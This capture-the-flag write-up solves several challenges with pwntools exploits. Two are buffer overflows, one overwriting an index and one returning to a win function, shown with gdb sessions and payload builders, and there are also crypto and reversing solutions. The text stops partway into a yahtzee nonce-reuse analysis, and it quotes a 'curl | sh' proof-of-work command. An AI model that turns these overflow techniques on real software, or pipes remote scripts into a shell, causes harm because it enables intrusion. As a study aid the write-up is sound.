The comparison is against the value at RBP-0x8, and the buffer passed to gets() starts at RBP-0x30, so 0x30-0x8 = 40 bytes of padding followed by 0xffffffffffffffff will do. Without the overflow the index can only ever be 0 or 1 (rand() & 1), so the system() branch is unreachable.

from pwn import *
import sys

if len(sys.argv) == 1:
    p = remote('mc.ax', 31199)
else:
    p = process('./beginner-generic-pwn-number-0')

# 40 bytes fill the buffer at rbp-0x30 up to inspirational_message_index
# at rbp-0x8; the next 8 bytes overwrite it with -1.
payload = b'A' * 40
payload += p64(0xffffffffffffffff)

for _ in range(3):
    data = p.recvline().rstrip()
    print(data)
print(payload)
p.sendline(payload)
p.interactive()

The result of running it is as follows.

[+] Opening connection to mc.ax on port 31199: Done
"&#120365;&#120358;&#120373;&#120372; &#120355;&#120371;&#120358;&#120354;&#120364; &#120373;&#120361;&#120358; &#120373;&#120371;&#120354;&#120357;&#120362;&#120373;&#120362;&#120368;&#120367; &#120368;&#120359; &#120365;&#120354;&#120372;&#120373; &#120366;&#120362;&#120367;&#120374;&#120373;&#120358; &#120356;&#120361;&#120354;&#120365;&#120365; &#120376;&#120371;&#120362;&#120373;&#120362;&#120367;&#120360;"
rob inc has had some serious layoffs lately and i have to do all the beginner pwn all my self!
can you write me a heartfelt message to cheer me up? :(
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xff\xff\xff\xff\xff\xff\xff\xff
[*] Switching to interactive mode
$ ls
flag.txt
run
$ cat flag.txt
flag{im-feeling-a-lot-better-but-rob-still-doesnt-pay-me}
flag{im-feeling-a-lot-better-but-rob-still-doesnt-pay-me}

ret2generic-flag-reader (pwn)

Use the buffer overflow to return into super_generic_flag_reading_function_please_ret_to_me.

$ file ret2generic-flag-reader 
ret2generic-flag-reader: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=c749a16c9546cfe2cab694374c7d003c2bbb52f3, for GNU/Linux 3.2.0, not stripped

$ gdb -q ./ret2generic-flag-reader
Reading symbols from ./ret2generic-flag-reader...(no debugging symbols found)...done.
gdb-peda$ i func
All defined functions:

Non-debugging symbols:
0x0000000000401000  _init
0x00000000004010a0  puts@plt
0x00000000004010b0  fclose@plt
0x00000000004010c0  setbuf@plt
0x00000000004010d0  fgets@plt
0x00000000004010e0  gets@plt
0x00000000004010f0  fopen@plt
0x0000000000401100  exit@plt
0x0000000000401110  _start
0x0000000000401140  _dl_relocate_static_pie
0x0000000000401150  deregister_tm_clones
0x0000000000401180  register_tm_clones
0x00000000004011c0  __do_global_dtors_aux
0x00000000004011f0  frame_dummy
0x00000000004011f6  super_generic_flag_reading_function_please_ret_to_me
0x00000000004013a5  main
0x0000000000401430  __libc_csu_init
0x00000000004014a0  __libc_csu_fini
0x00000000004014a8  _fini
gdb-peda$ start

[----------------------------------registers-----------------------------------]
RAX: 0x4013a5 (<main>:	endbr64)
RBX: 0x0 
RCX: 0x401430 (<__libc_csu_init>:	endbr64)
RDX: 0x7fffffffdf18 --> 0x7fffffffe26b ("CLUTTER_IM_MODULE=xim")
RSI: 0x7fffffffdf08 --> 0x7fffffffe242 ("/mnt/hgfs/Shared/ret2generic-flag-reader")
RDI: 0x1 
RBP: 0x401430 (<__libc_csu_init>:	endbr64)
RSP: 0x7fffffffde28 --> 0x7ffff7a03bf7 (<__libc_start_main+231>:	mov    edi,eax)
RIP: 0x4013a5 (<main>:	endbr64)
R8 : 0x7ffff7dced80 --> 0x0 
R9 : 0x7ffff7dced80 --> 0x0 
R10: 0x0 
R11: 0x0 
R12: 0x401110 (<_start>:	endbr64)
R13: 0x7fffffffdf00 --> 0x1 
R14: 0x0 
R15: 0x0
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x4013a2 <super_generic_flag_reading_function_please_ret_to_me+428>:	nop
   0x4013a3 <super_generic_flag_reading_function_please_ret_to_me+429>:	
    leave  
   0x4013a4 <super_generic_flag_reading_function_please_ret_to_me+430>:	
    ret    
=> 0x4013a5 <main>:	endbr64 
   0x4013a9 <main+4>:	push   rbp
   0x4013aa <main+5>:	mov    rbp,rsp
   0x4013ad <main+8>:	sub    rsp,0x20
   0x4013b1 <main+12>:	
    mov    rax,QWORD PTR [rip+0x2ca8]        # 0x404060 <stdout@@GLIBC_2.2.5>
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffde28 --> 0x7ffff7a03bf7 (<__libc_start_main+231>:	mov    edi,eax)
0008| 0x7fffffffde30 --> 0x1 
0016| 0x7fffffffde38 --> 0x7fffffffdf08 --> 0x7fffffffe242 ("/mnt/hgfs/Shared/ret2generic-flag-reader")
0024| 0x7fffffffde40 --> 0x100008000 
0032| 0x7fffffffde48 --> 0x4013a5 (<main>:	endbr64)
0040| 0x7fffffffde50 --> 0x0 
0048| 0x7fffffffde58 --> 0x48185c2f2775a721 
0056| 0x7fffffffde60 --> 0x401110 (<_start>:	endbr64)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Temporary breakpoint 1, 0x00000000004013a5 in main ()
gdb-peda$ pattc 100
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'
gdb-peda$ c
Continuing.
alright, the rob inc company meeting is tomorrow and i have to come up with a new pwnable...
how about this, we'll make a generic pwnable with an overflow and they've got to ret to some flag reading function!
slap on some flavortext and there's no way rob will fire me now!
this is genius!! what do you think?
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL

Program received signal SIGSEGV, Segmentation fault.

[----------------------------------registers-----------------------------------]
RAX: 0x0 
RBX: 0x0 
RCX: 0x7ffff7dcda00 --> 0xfbad208b 
RDX: 0x7ffff7dcf8d0 --> 0x0 
RSI: 0x7ffff7dcda83 --> 0xdcf8d0000000000a 
RDI: 0x0 
RBP: 0x6141414541412941 ('A)AAEAAa')
RSP: 0x7fffffffde28 ("AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
RIP: 0x40142f (<main+138>:	ret)
R8 : 0x7ffff7dcf8c0 --> 0x0 
R9 : 0x7ffff7fd84c0 (0x00007ffff7fd84c0)
R10: 0x3 
R11: 0x246 
R12: 0x401110 (<_start>:	endbr64)
R13: 0x7fffffffdf00 --> 0x1 
R14: 0x0 
R15: 0x0
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x401424 <main+127>:	call   0x4010e0 <gets@plt>
   0x401429 <main+132>:	mov    eax,0x0
   0x40142e <main+137>:	leave  
=> 0x40142f <main+138>:	ret    
   0x401430 <__libc_csu_init>:	endbr64 
   0x401434 <__libc_csu_init+4>:	push   r15
   0x401436 <__libc_csu_init+6>:	
    lea    r15,[rip+0x29d3]        # 0x403e10
   0x40143d <__libc_csu_init+13>:	push   r14
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffde28 ("AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0008| 0x7fffffffde30 ("bAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0016| 0x7fffffffde38 ("AcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0024| 0x7fffffffde40 ("AAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0032| 0x7fffffffde48 ("IAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0040| 0x7fffffffde50 ("AJAAfAA5AAKAAgAA6AAL")
0048| 0x7fffffffde58 ("AAKAAgAA6AAL")
0056| 0x7fffffffde60 --> 0x4c414136 ('6AAL')
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x000000000040142f in main ()
gdb-peda$ patto AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL
AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL found at offset: 40

After 40 bytes, place the address of super_generic_flag_reading_function_please_ret_to_me (0x4011f6). main's frame is 0x20 bytes (`sub rsp,0x20`), so the saved RBP sits at offset 32 and the return address at 40, matching what patto reports. The binary is not PIE (fixed addresses around 0x401000), so the address can be hardcoded.

from pwn import *
import sys

if len(sys.argv) == 1:
    p = remote('mc.ax', 31077)
else:
    p = process('./ret2generic-flag-reader')

# 40 bytes reach the saved return address; overwrite it with the
# address of the flag-reading function (binary is not PIE).
payload = b'A' * 40
payload += p64(0x4011f6)

for _ in range(4):
    data = p.recvline().rstrip()
    print(data)
print(payload)
p.sendline(payload)
data = p.recvline().rstrip()
print(data)

The result of running it is as follows.

[+] Opening connection to mc.ax on port 31077: Done
alright, the rob inc company meeting is tomorrow and i have to come up with a new pwnable...
how about this, we'll make a generic pwnable with an overflow and they've got to ret to some flag reading function!
slap on some flavortext and there's no way rob will fire me now!
this is genius!! what do you think?
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�@\x00\x00
flag{rob-loved-the-challenge-but-im-still-paid-minimum-wage}
[*] Closed connection to mc.ax port 31077
flag{rob-loved-the-challenge-but-im-still-paid-minimum-wage}
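Both pwn writeups above find the overwrite offset by feeding a peda pattern (pattc) and looking up the chunk that landed in RBP or RSP (patto). As an added example (not from the original writeup), the code below does the same in plain Python: it generates a de Bruijn sequence, the construction pwntools' cyclic()/cyclic_find() also use, so that any 4-byte window maps back to a unique offset, and then lays out the two payloads with the offsets and targets derived above. The frame layouts in the comments are read off the disassembly on this page; peda's own pattern alphabet differs, so offsets must be looked up in the pattern that was actually sent.

```python
# Added example (not from the original writeup): offset finding with a
# de Bruijn sequence (what peda's pattc/patto and pwntools' cyclic/cyclic_find
# do), plus the payload layout for the two challenges on this page.
import struct
from string import ascii_lowercase


def de_bruijn(alphabet: bytes = ascii_lowercase.encode(), n: int = 4) -> bytes:
    """Full de Bruijn sequence B(k, n): every n-byte window occurs exactly once."""
    k = len(alphabet)
    a = [0] * (k * n)
    seq = []

    def db(t, p):
        if t > n:
            if n % p == 0:
                seq.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return bytes(alphabet[i] for i in seq)


_PATTERN = de_bruijn()


def cyclic(length: int) -> bytes:
    """First `length` bytes of the pattern (what pattc prints)."""
    return _PATTERN[:length]


def cyclic_find(chunk: bytes) -> int:
    """Offset of `chunk` in the pattern (what patto reports). Pass the bytes that
    landed in RBP or at RSP after the crash; -1 if they are not from the pattern."""
    return _PATTERN.find(chunk[:4]) if len(chunk) >= 4 else -1


def build_payload(offset: int, value: int, filler: bytes = b'A') -> bytes:
    """Padding up to the overwritten slot, then a little-endian 64-bit value."""
    return filler * offset + struct.pack('<Q', value)


# Offsets and targets as derived in the two writeups above.
# beginner-generic-pwn-number-0: buffer at rbp-0x30, index at rbp-0x8.
INDEX_OFFSET = 0x30 - 0x8                 # 40
# ret2generic-flag-reader: 0x20-byte frame, saved rbp, then the return address.
RET_OFFSET = 0x20 + 0x8                   # 40
FLAG_READER = 0x4011f6                    # super_generic_flag_reading_function_please_ret_to_me

if __name__ == '__main__':
    print(cyclic(100))
    print('offset of the chunk found in RBP:', cyclic_find(cyclic(100)[48:56]))
    print(build_payload(INDEX_OFFSET, 0xffffffffffffffff))
    print(build_payload(RET_OFFSET, FLAG_READER))
```

Because every 4-byte window of the sequence is unique, a single crash is enough to recover the offset; with a plain run of `A`s you would have to bisect the length instead.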

round-the-bases (crypto)

Decode repeatedly, in this order:

・base85
・base64
・base16
・space-separated decimal character codes (ASCII)
・space-separated decimal character codes (ASCII) again
・binary, with '<' as 0 and '=' as 1

#!/usr/bin/python3
from base64 import *

with open('round-the-bases', 'r') as f:
    data = f.read()

data = a85decode(data)
print('[+] 1:', data)
data = b64decode(data)
print('[+] 2:', data)
data = b16decode(data)
print('[+] 3:', data)
codes = map(int, data.split(b' '))
data = ''.join([chr(code) for code in codes]).encode()
print('[+] 4:', data)
codes = map(int, data.split(b' '))
data = ''.join([chr(code) for code in codes]).encode()
print('[+] 5:', data)
bin_code = data.replace(b'<', b'0').replace(b'=', b'1')
data = ''.join([chr(int(bin_code[i:i+8], 2)) for i in range(0, len(bin_code), 8)]).encode()
print('[*] flag:', data)

The result of running it is as follows.

[*] flag: b'flag{w0w_th4t_w4s_4ll_wr4pp3d_up}'
flag{w0w_th4t_w4s_4ll_wr4pp3d_up}

bread-making (rev)

Decompile it with Ghidra.

undefined8 FUN_00102180(void)

{
  undefined *puVar1;
  long lVar2;
  int iVar3;
  char *pcVar4;
  size_t sVar5;
  long lVar6;
  long in_FS_OFFSET;
  char acStack200 [136];
  long local_40;
  
  local_40 = *(long *)(in_FS_OFFSET + 0x28);
  setbuf(stdin,(char *)0x0);
  setbuf(stdout,(char *)0x0);
  setbuf(stderr,(char *)0x0);
  signal(0xe,FUN_001024d0);
  DAT_00106440 = 0;
  do {
    alarm(*(uint *)(&PTR_DAT_00106020)[DAT_00106440]);
    puts(*(char **)((&PTR_DAT_00106020)[DAT_00106440] + 8));
    do {
      pcVar4 = fgets(acStack200,0x80,stdin);
      if (pcVar4 == (char *)0x0) {
LAB_00102330:
        FUN_001024a0();
        goto LAB_00102337;
      }
      sVar5 = strcspn(acStack200,"\n");
      acStack200[sVar5] = '\0';
      puVar1 = (&PTR_DAT_00106020)[DAT_00106440];
      lVar2 = *(long *)(puVar1 + 0x18);
      if (lVar2 == 0) goto LAB_00102330;
      lVar6 = 0;
      while( true ) {
        iVar3 = strcmp(acStack200,*(char **)(puVar1 + lVar6 * 0x10 + 0x20));
        if (iVar3 == 0) break;
        lVar6 = lVar6 + 1;
        if (lVar2 == lVar6) goto LAB_00102330;
      }
      iVar3 = (**(code **)(puVar1 + lVar6 * 0x10 + 0x28))();
      if (iVar3 == -1) goto LAB_00102330;
    } while (iVar3 != 0);
    DAT_00106440 = DAT_00106440 + 1;
    puts("");
  } while (DAT_00106440 < 0xb);
  alarm(0);
  puts("it\'s the next morning");
  if (_DAT_0010641c == 0) {
    puts("mom finds flour in the sink and accuses you of making bread");
  }
  else {
    if (_DAT_00106418 == 0) {
LAB_00102337:
      puts("mom finds flour on the counter and accuses you of making bread");
    }
    else {
      if (_DAT_00106414 == 0) {
        puts("mom finds burnt bread on the counter and accuses you of making bread");
      }
      else {
        if (_DAT_00106410 == 0) {
          puts("mom finds the window opened and accuses you of making bread");
        }
        else {
          if (_DAT_0010640c == 0) {
            puts("mom finds the fire alarm in the laundry room and accuses you of making bread");
          }
          else {
            FUN_001025c0();
          }
        }
      }
    }
  }
  if (local_40 == *(long *)(in_FS_OFFSET + 0x28)) {
    return 0;
  }
                    /* WARNING: Subroutine does not return */
  __stack_chk_fail();
}

void FUN_001025c0(void)

{
  FILE *__stream;
  char *pcVar1;
  long in_FS_OFFSET;
  char acStack152 [136];
  long local_10;
  
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  puts("mom doesn\'t suspect a thing, but asks about some white dots on the bathroom floor");
  __stream = fopen("flag.txt","r");
  if (__stream != (FILE *)0x0) {
    pcVar1 = fgets(acStack152,0x80,__stream);
    if (pcVar1 != (char *)0x0) {
      puts(acStack152);
      goto LAB_00102634;
    }
  }
  puts("couldn\'t open/read flag file, contact an admin if running on server");
LAB_00102634:
  if (local_10 == *(long *)(in_FS_OFFSET + 0x28)) {
    return;
  }
                    /* WARNING: Subroutine does not return */
  __stack_chk_fail();
}

                             s_add_ingredients_to_the_bowl_00103b3c          XREF[2]:     FUN_00102180:00102220(*), 
                                                                                          00106348(*)  
        00103b3c 61 64 64        ds         "add ingredients to the bowl"
                 20 69 6e 
                 67 72 65 
                             s_add_flour_00103b58                            XREF[3]:     FUN_00102180:00102297(*), 
                                                                                          FUN_00102180:00102332(*), 
                                                                                          00106360(*)  
        00103b58 61 64 64        ds         "add flour"
                 20 66 6c 
                 6f 75 72 00
                             s_add_yeast_00103b62                            XREF[2]:     FUN_00102180:00102297(*), 
                                                                                          00106370(*)  
        00103b62 61 64 64        ds         "add yeast"
                 20 79 65 
                 61 73 74 00
                             s_add_salt_00103b6c                             XREF[1]:     00106380(*)  
        00103b6c 61 64 64        ds         "add salt"
                 20 73 61 
                 6c 74 00
                             s_add_water_00103b75                            XREF[1]:     00106390(*)  
        00103b75 61 64 64        ds         "add water"
                 20 77 61 
                 74 65 72 00
        00103b7f 00              ??         00h

Checking the strings around here and trying various inputs, I work out the correct sequence of answers.

from pwn import *
import sys

if len(sys.argv) == 1:
    p = remote('mc.ax', 31796)
else:
    p = process('./bread')


def recv():
    return p.recvline().rstrip().decode()


# Each stage: the server prints a prompt, expects these commands in order,
# answers each with one line, and prints a blank line once the stage is done
# (11 stages, matching the DAT_00106440 < 0xb loop in the decompiled main)
stages = [
    # add ingredients to the bowl
    ['add flour', 'add yeast', 'add salt', 'add water'],
    # the ingredients are added and stirred into a lumpy dough
    ['hide the bowl inside a box'],
    # the bread needs to rise
    ['wait 3 hours'],
    # it is time to finish the dough
    ['work in the basement'],
    # the dough is done, and needs to be baked
    ['preheat the toaster oven'],
    # the bread is in the oven, and bakes for 45 minutes
    ['set a timer on your phone'],
    # 45 minutes is an awfully long time
    ['watch the bread bake'],
    # there's no time to waste
    ['pull the tray out with a towel'],
    # there's smoke in the air
    ['unplug the oven', 'unplug the fire alarm', 'open the window'],
    # the kitchen is a mess
    ['wash the sink', 'clean the counters', 'flush the bread down the toilet',
     'get ready to sleep'],
    # time to go to sleep
    ['close the window', 'replace the fire alarm', 'brush teeth and go to bed'],
]

for todoes in stages:
    print(recv())            # stage prompt
    for todo in todoes:
        print(todo)
        p.sendline(todo.encode())
        print(recv())        # reply to the command
    print(recv())            # blank line between stages

# "it's the next morning", mom's verdict, and the flag
for _ in range(3):
    print(recv())

The result of running it is as follows.

[+] Opening connection to mc.ax on port 31796: Done
add ingredients to the bowl
add flour
flour has been added
add yeast
yeast has been added
add salt
salt has been added
add water
water has been added

the ingredients are added and stirred into a lumpy dough
hide the bowl inside a box
the box is nice and warm

the bread needs to rise
wait 3 hours
the dough has risen

it is time to finish the dough
work in the basement
you bring a bottle of oil and a tray

the dough is done, and needs to be baked
preheat the toaster oven
the oven glows a soft red-orange

the bread is in the oven, and bakes for 45 minutes
set a timer on your phone
the timer ticks down

45 minutes is an awfully long time
watch the bread bake
the bread has risen, touching the top of the oven and catching fire

there's no time to waste
pull the tray out with a towel
the flaming loaf sizzles in the sink

there's smoke in the air
unplug the oven
the oven shuts off
unplug the fire alarm
you put the fire alarm in another room
open the window
cold air rushes in

the kitchen is a mess
wash the sink
the sink is cleaned
clean the counters
the counters are cleaned
flush the bread down the toilet
the half-baked bread is disposed of
get ready to sleep
everything appears to be okay

time to go to sleep
close the window
the window is closed
replace the fire alarm
the fire alarm is replaced
brush teeth and go to bed
you sleep very well

it's the next morning
mom doesn't suspect a thing, but asks about some white dots on the bathroom floor
flag{m4yb3_try_f0ccac1a_n3xt_t1m3???0r_dont_b4k3_br3ad_at_m1dnight}
[*] Closed connection to mc.ax port 31796
flag{m4yb3_try_f0ccac1a_n3xt_t1m3???0r_dont_b4k3_br3ad_at_m1dnight}

blecc (crypto)

The numbers are all relatively small, so factor the group order and solve the discrete logarithm problem in each prime-power subgroup (Pohlig-Hellman).

#!/usr/bin/sage
from Crypto.Util.number import *

p = 17459102747413984477
a = 2
b = 3
G = (15579091807671783999, 4313814846862507155)
Q = (8859996588597792495, 2628834476186361781)

F = FiniteField(p)
E = EllipticCurve(F, [a, b])
G = E.point(G)
Q = E.point(Q)
# Pohlig-Hellman: solve the DLP in each prime-power subgroup of the curve
# order, then recombine the partial logs with the CRT
factors, exponents = zip(*factor(E.order()))
primes = [factors[i] ^ exponents[i] for i in range(len(factors))]
dlogs = []
for fac in primes:
    t = int(G.order()) // int(fac)   # integer division ('/' would give a float)
    dlog = discrete_log(t*Q, t*G, operation='+')
    dlogs += [dlog]

d = crt(dlogs, primes)
print('[+] d =', d)
assert d * G == Q

flag = long_to_bytes(int(d)).decode()
flag = 'flag{%s}' % flag
print('[*]flag =', flag)

The result of running it is as follows.

[+] d = 7868191182322623331
[*]flag = flag{m1n1_3cc}
flag{m1n1_3cc}
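To double-check the recovered scalar without Sage, here is an added example (not the writeup's code) with affine point arithmetic on y^2 = x^3 + 2x + 3 over F_p in plain Python; it uses the challenge parameters and the d printed above, and decodes d into the flag the same way long_to_bytes does.

```python
# Added example (not from the writeup): affine short-Weierstrass arithmetic in
# plain Python, used to check the recovered scalar d against the challenge
# parameters and to turn it into the flag without Sage or pycryptodome.
p = 17459102747413984477
a, b = 2, 3
G = (15579091807671783999, 4313814846862507155)
Q = (8859996588597792495, 2628834476186361781)
d = 7868191182322623331  # the "[+] d" printed by the Sage script above


# None stands for the point at infinity (the group identity)
def on_curve(P):
    if P is None:
        return True
    x, y = P
    return (y * y - (x * x * x + a * x + b)) % p == 0


def ec_add(P, R):
    if P is None:
        return R
    if R is None:
        return P
    (x1, y1), (x2, y2) = P, R
    if x1 == x2 and (y1 + y2) % p == 0:
        return None                                        # P + (-P)
    if P == R:
        lam = (3 * x1 * x1 + a) * pow(2 * y1, -1, p) % p   # tangent slope
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, p) % p          # chord slope
    x3 = (lam * lam - x1 - x2) % p
    return (x3, (lam * (x1 - x3) - y1) % p)


def ec_mul(k, P):
    """Right-to-left double-and-add; fine for verification, not constant-time."""
    R = None
    while k:
        if k & 1:
            R = ec_add(R, P)
        P = ec_add(P, P)
        k >>= 1
    return R


def scalar_to_flag(k):
    """Big-endian bytes of k (what long_to_bytes returns) wrapped in flag{...}."""
    return "flag{%s}" % k.to_bytes((k.bit_length() + 7) // 8, "big").decode()


if __name__ == "__main__":
    assert on_curve(G) and on_curve(Q)
    assert ec_mul(d, G) == Q
    print(scalar_to_flag(d))
```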

yahtzee (crypto)

An outline of the server's processing:

・true_rng = TrueRNG(2)
 ・rolls = 2
・Repeat the following until 'quit'
 ・message = random_message().encode()
  ・Pick one of the 25 lines in quotes at random, split it on spaces into a list, and insert the flag at some position in it.
 ・encrypted = encrypt(message, key, true_rng)
  ・nonce = true_rng.next()
   ・TrueRNG.yahtzee(2)
    ・dice = list of 2 random values from 1 to 6
    ・returns the sum of dice
  ・AES-CTR encryption
   → output

So the nonce has only 11 possible values, 2 through 12. First, let's look at the output.

$ nc mc.ax 31076
proof of work: curl -sSfL https://pwn.red/pow | sh -s s.AAATiA==.z34uX6azbkYSA7Lxu93WPw==
solution: s.P908u4Z4PUcNfpELBVV51t3d2C19aIBqkSTEZ7nzpOGkUHOo2IgPxBa5YwiX/0wzOd5dm3/iACvJEpuOGdm5Fis7YHtDXZAOamUUxSzicaQAQ/owWvI60YAYv7q434ULEfrv/hhAaVZgfTeZtfIj75f6A2ScwsbniMaN6dO2RxaOSbdWR6g19uJEqQWx7lPNCFqL/f4cAi22xTSFa3bfEA==

============================================================================
=            Welcome to the yahtzee message encryption service.            =
=  We use top-of-the-line TRUE random number generators... dice in a cup!  =
============================================================================
Would you like some samples?
y
Ciphertext: 2c19383b50c4b6f73821318124a186a352d713f0432dccd6305367892a1d2495c61edbe1015ab4fee8f7bc34ab59b3abad8c59c5a3a7ae16a43f7c2b8d7acf5a3eb804936d507aed55142cb5259dab8f83124641f32c4dbca21daecc20a0e94ec9ce9980073ad53e3c
Would you like some more samples, or are you ready to 'quit'?
y
Ciphertext: b893de780007c68f9a99e768b74826588f289a602506ce3e72357568a349b712f206ae5d8f60ce46e51c0ed4d37954c0a647391b28e43185e8312420910ff15a79b4a2f0d111b7babc56d46d01a2c9d70bd7daf8c8c26c251c19d0325c86ec735a39b2819cc832
Would you like some more samples, or are you ready to 'quit'?
y
Ciphertext: 10f31e469309e0aa0c6768e852ebacb028d4fe71aa636e015d3117da86d6f5dde013d3327519b43a1ea81f81ea80800772c63e81314447e531d818de4ce8902f77047c0244b18fa2480794c0e6d74d3297c9b4e19c2e2160bfd114a24c7e657abac2e96d56a5e242135e52ff18b2632b59ad02e9
Would you like some more samples, or are you ready to 'quit'?
y
Ciphertext: 4fd2dfe89dc578470c8bed4059342f068405ce54719e6f1152ea1615ecb598b59bce9b13b231c6c51ec63337b3b12df13421ca0fcff1697944fbf91c39766c440f0b0c11ae9f9c01173d161c6649f5fa9fe10893274bd7a4f984adae98c0835133
Would you like some more samples, or are you ready to 'quit'?
y
Ciphertext: 8ec3ff77926c5e462412e17d4b342dba922f03e456b4a6abe96bdd6b824e343a1530224f69705abc80af990adda56b95a767d5f1a14392a59e105e0a3010f4795f596a2166e1a0242e35a071f2452a95da08dee32976d73751daea2d9d3466b1967bbbae522329c834
Would you like some more samples, or are you ready to 'quit'?
y
Ciphertext: 91135aa897cc7cf173e770d926f6cc00c95840aee34aa4ecf0dc2fd5fefbe641774ded4e5f69201dc68314579a03b380e86a2404f08c6ad03573c1f0cce76350b27d3e29a51ecbe37d9f6d63750947b90bc000c42270861980dcfc0ce782a8ce093a656a87b899584e1b1d6c
Would you like some more samples, or are you ready to 'quit'?
y
Ciphertext: 800d5afa8cdd67ec3df439cd2ca3ce0ac94e40aeea45b4e58fff6981ef84e548611fec0d207e0a23879e4044cd1ce4dd9c673741f1c97ede356384f689fd6450a97a7338ed1298ac6f9b69762e4a468239d45ed65d628b1d80c1
Would you like some more samples, or are you ready to 'quit'?
y
Ciphertext: 4297d8ecd3c26356428fbe430b342d53811d8f5c6c8e6a3725b84b00d4bac0b8b6aadc7da821ed9e15c072749ca61f8e773acc0d90f275240debb01a326621440f0b1006a282d5012e721e1f3208baeccdef008a645e94a3f6c1b6b2d5c1884674a7b36d3a6881
Would you like some more samples, or are you ready to 'quit'?
y
Ciphertext: 2c1e323b50caabfa382a3ec737bbc5b74cc613ea443082d77c5b73d26e1d1ee2964accd7065bbee2fbf08c7a8565f4e9f98a01d0faa8eb09b9697c36ca37c55d29f419c17c5479ff161f3daf6ac8be86c2025851fa017fa8ff0087d126a2bb12cfe3d7a93d68c93960c01af99c
Would you like some more samples, or are you ready to 'quit'?
y
Ciphertext: 8387826491977894a631ffc36ceceeeec47b3d1413b2eec57122b48bdfbc1e89505278536a206704ea830cf6b58c15b8ed8f6e7d162a535f1387ba3672383fd60d798218cf30d6bd6fcc2bc616243861b7adbb14ea6f86d582807e0a50505e92977e6f
Would you like some more samples, or are you ready to 'quit'?
y
Ciphertext: a8218c72990c679179fdffdd06f220d75f1b95be324363c5d71e926a7ac77d8260934a4b7bbbada3f22031a71201770cbfde374d343ee8435be5f606a7d6a2ac7f098e84ccb900ac8b9631138636db48f0ff4bce8f4d5f3e569d2f985b76fefe8ec454dc82c3fe99f3937b309a68bb75
Would you like some more samples, or are you ready to 'quit'?
y
Ciphertext: 9b8ce0328d7e5f51240aef321e2161ba873113e26697b2fcf155ce78d754581e7e6f194f2e764bbc83acbf19b2943d8db667c5ecb95ad7e996465a0d2444fa674859603675e5bf777a25ac77f710389e830bd3aa2663927958c4b2
Would you like some more samples, or are you ready to 'quit'?
y
Ciphertext: b893de780007c68f9a99e768b74826588f289a602506ce3e72357568a349b712fa06bf55dd7dce5ce50a46cb817855c3a04139192fa039dca972203b810efd4268f5a2f6c207ebba8104dc6545e388c900ccd6e4c5d16c241f4e93★
Would you like some more samples, or are you ready to 'quit'?
y
Ciphertext: 2a133a7e50c7bdfc383a3fc025f2c8ad549254fb582d85de3b12779a7b015bbb9d5a8fc9145ca5acb2f7c3298b6be5b1b0930cc6fabbae0da2277120983cd5436ceb1493675a72be1a1069b02889bf91930d7c36a66f5cc3ba1cbdd77db4964ff3e38a881629973d6b8d4aec9456181d
Would you like some more samples, or are you ready to 'quit'?
y
Ciphertext: 68b61df4fed11c522b7abf14f5541c6af3ab5efa3b51dba1cae8317e0ed78e2f4ebcb21ef8cce4853db51f3674afacfd084c92731e3d78ce919c483be73bc01d472a3cccd867a148cea9242077712d317be9282fe13519888b336b35dd
Would you like some more samples, or are you ready to 'quit'?
y
Ciphertext: 3d00326944d1b0e7762977d83ea7d0a700d45fff4b22dcd8036534c36e2a0faa975d9ccd2a5c9ed3e8ea9728d476f9b8f99b1fd0a8faf91ba33d7021ca33d30f23f64095605437f1011e2ca4649bb18ec6454c07b2384dfdbc5a
Would you like some more samples, or are you ready to 'quit'?
y
Ciphertext: 9296d97a5b5eddf0bac5b768c84b2b1d907a825a6b20e5213c206b2fb249b912d347bc10cd6bc45ce95d4fc8d67749c6e544701822e43a90a93536629a25cb1d3ca193e7dc07eba98629db4f7ef087d30b88cef4d6962e2f54
Would you like some more samples, or are you ready to 'quit'?
y
Ciphertext: 9fdfcf7a0944c1beedcbba7d8f477e55a24cdd0e3f16e5657933342b8c5e856d8848bb429f7ed84fe50a46cb817855c3a04139192fa039dca972203b810efd4268f5a2f6c207ebba8104dc6545e388c900ccd6e4c5d16c241f4e93★

Two similar ciphertexts show up in the output (marked ★ above). They have the same total length, differ in the first 40 bytes and are identical from there on, so the quote the flag was inserted into is presumably the same and so is the nonce.
The first 40 bytes should therefore be one of these two patterns:

・part of the quote + flag
・flag + part of the quote

Since the first 40 bytes are encrypted under the same key and nonce, hence the same keystream, decrypt them by guessing. The two differing ciphertext segments are:

